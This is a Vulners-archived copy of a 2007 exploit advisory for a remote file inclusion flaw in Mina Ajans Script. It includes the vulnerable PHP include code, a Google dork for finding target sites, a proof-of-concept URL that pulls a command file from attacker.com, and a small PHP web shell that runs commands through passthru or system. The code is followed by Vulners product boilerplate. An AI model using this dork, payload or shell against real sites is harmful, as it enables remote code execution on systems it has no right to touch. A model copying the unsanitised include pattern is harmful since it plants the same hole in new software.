Lucene search
K

mina-rfi.txt

🗓️ 06 Feb 2007 00:00:00Reported by GokhanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Mina Ajans Script suffers remote file inclusion vulnerability allowing external content execution.

Code
`$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
$  
$  
$ Title : Mina Ajans Script Remote File Inclusion Vuln.  
$ Author : CanberX , BLaCKWHITE  
$ Free : NOT :(  
$ Disb : www.minaajans.com.tr  
$ G. Dork : "Tasarim ve program: Mina Ajans."  
$  
$ Vuln Code :  
""""""""""""""""""""""""""""""""""""""""""""  
<?  
$_GET["syf"];  
include_once $syf;  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ PoC : http://target.com/[vuln_file].php?syf=http://attacker.com/cmd.txt?cmd=id  
$  
$ CMD Ex. :  
""""""""""""""""""""""""""""""""""""""""""""  
<?php  
error_reporting(0);  
$cmd=$_GET["cmd"];  
include $cmd;  
passthru($cmd); // if passthru disabled then use @system("string");  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ CanberX , BLaCKWHITE  
$  
$ gr33tz: BLaSTeR  
$  
$ web: canberx.uni.cc & blackwhite.tc & bl4ster.net  
$  
$ Don't be n00b!..  
$  
$  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4
28